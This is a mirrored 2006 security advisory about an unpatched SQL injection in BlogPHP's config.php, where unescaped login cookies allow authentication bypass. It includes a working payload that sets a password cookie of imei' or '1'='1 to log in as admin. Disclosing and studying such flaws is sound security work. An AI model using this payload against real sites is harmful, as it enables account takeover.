The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


BlogPHP config.php SQL injection login bypass


<< Previous INDEX Search src / Print Next >>
Date: 20 Jan 2006 21:01:37 -0000
From: [email protected]
To: [email protected]
Subject: BlogPHP config.php SQL injection login bypass
X-Virus-Scanned: antivirus-gw at tyumen.ru

--------------------Summary----------------

Software: BlogPHP
Sowtware's Web Site: http://www.blogphp.net/
Versions: 1(2)
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: imei
-----------------Description---------------
Vulnerable scripts (as include):
config.php

Variable $_COOKIE[blogphp_username]and $_COOKIE[blogphp_password] never addslashed and have potential for SQL inject

--------------Exploit----------------------
send a cookie:
blogphp_username=admin
blogphp_password=imei' or '1'='1
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: imei
contact : [email protected]


(why i must send it more than one time?)


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру